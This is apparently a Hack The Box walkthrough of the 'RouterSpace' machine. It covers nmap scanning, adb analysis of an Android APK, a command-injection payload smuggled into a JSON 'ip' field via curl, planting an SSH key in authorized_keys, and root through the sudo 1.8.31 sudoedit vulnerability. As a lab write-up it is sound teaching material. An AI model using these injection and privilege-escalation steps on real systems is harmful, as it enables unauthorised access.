RouterSpace — Hackthebox Walkthrough
This was a pretty cool box which included finding an endpoint from a APK file and then exploiting a node application to get command execution. For the root part, we have to exploit the sudoedit vulnerability which was a pretty hot topic these days.
User
namp reveals two 2 open ports.
nmap --open -sC -sV 10.10.11.148
PORT STATE SERVICE REASON VERSION
22/tcp open tcpwrapped syn-ack
| ssh-hostkey:
| 3072 f4:e4:c8:0a:a6:af:66:93:af:69:5a:a9:bc:75:f9:0c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDTJG10LrPb/oV0/FaR2FprNXTVtRobg1Jwy5UOJGrzjWqI8lNDf5DDi3ilSdkJZ0+0Rwr4/gKG5UlyvqCz07XrPfnWG+E7NrgpMpVKR4LF9fbX750gxK+hOSco3qQclv3CUTjTzwMgxf0ltyOg6WJvThYQ3CFDDeOc4T27YqQ/VgwBT92PWu6aZgWX2oAn+X8/fdcejGWeumU9b+rufiNt/pQ1dGUz+wkHeb2pIaA4WfEQLHB1xF33rTZuAXFDiKSb35EpPvhuShsMPQv6Q+NfLAiENgdy+UdybSNH6k1gmPHyroSYoXth7Pelpg+38V9SYtvvoxQRqBbaLApEClTnIM/IvQba9vY8VdfKYDGDcgeuPm8ksnOFPrb5L6axwl0K2ngE4VHQBJM0yxIRo5dELswD1c9O1tR2rq6MbW2giPl6dx/xzEbdVV6VO5n/prjsnpEs8YvNmnELrt6mt0FkcJQ9ageN5ji3pecKxKTVY4J71yf4+cVZKwpX8xI5H6E=
80/tcp open tcpwrapped syn-ack
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: RouterSpace
|_http-favicon: Unknown favicon MD5: 939407566E5C96D4EDF42DDDC4434FB3
|_http-trane-info: Problem with XML parsing of /evox/aboutLooking at the port 80, we see a static page.
This included a hyperlink download a APK file.
http://10.10.11.148/RouterSpace.apkI downloaded the file and did some static analysis. To be honest, this led me nowhere. So my only option was to install the APK on a device and see what it does.
I could have used Android Studio to start up an emulator to run this, but I used my old android device. It was just easier for me. So I used adb to connect to the device. If you are not familiar with what adb is, check out this article where I talk about the basics of adb
First, I installed the APK
adb install RouterSpace.apk
I listed the packages to confirm it was installed fine.
adb shell pm list packages|grep router
Then I did a dumpsys of the application which will simply give you information about the application.
adb shell dumpsys package com.routerspace
This gives us the activity name of the application which will help to start the application.
Then I invoked the application with the activity name I found.
adb shell am start -n com.routerspace/.MainActivity
NOTE: “All the steps after installing the APK could be done manually from the device itself, but I was more comfortable with adb ”
I was prompted saying Unable to connect to the server! when I click the Check Status button. Since I didn’t know what the error was about, I though of intercepting the traffic sent form the application and see what I could find.
For I configured a proxy with adb
adb shell settings put global http_proxy 192.168.1.6:8080
Then I started a listener on port 8080 with nc -lvnp 8080 and then clicked the Check Status button again. I got a POST request in my listener.
It was an POST request to a new endpoint.
/api/v4/monitoring/router/dev/check/deviceAccessI also saw there are some POST data being sent. I tried some basic injections with this and I was able to do Command Injection with this payload.
{'ip': '`id`'}
curl -X POST -H 'Content-Tpe: application/json' http:/10.10.11.148/api/v4/monitoring/router/dev/check/deviceAccess -d '{"ip": "`id`"}' -H 'user-agent: RouterSpaceAgent' -H 'Host: routerspace.htb'
I set added my SSH private key to the authorized_keys file and then sshed in.
cat "ssh-rsa ...<SNIP>..." >> ~/.ssh/authorized_key
Root
Doing some basic enumeration, I found out that the version of sudo in use was 1.8.31 with:
sudo --verion
I knew this was vulnerable to sudoedit SUDO vulnerability which came in recently.
With a little googling I found a GitHub repo which I could use to exploit this.
I followed the steps mentioned in the repo. First, the exploit.c , shellcode.c and Makefile files to the box. Then I used the make command to compile the C file.
Then I simply executed the exploit binary and I got a shell as root.
./exploit
Rooted!!
“If you have any questions, make sure to leave them down in the comments, or contact me through social media.”
Email — iamkavigihan@gmail.com
Instagram — https://www.instagram.com/_kavi.gihan/
Discord — kavigihan#8518
Happy Hacking !!! 😄
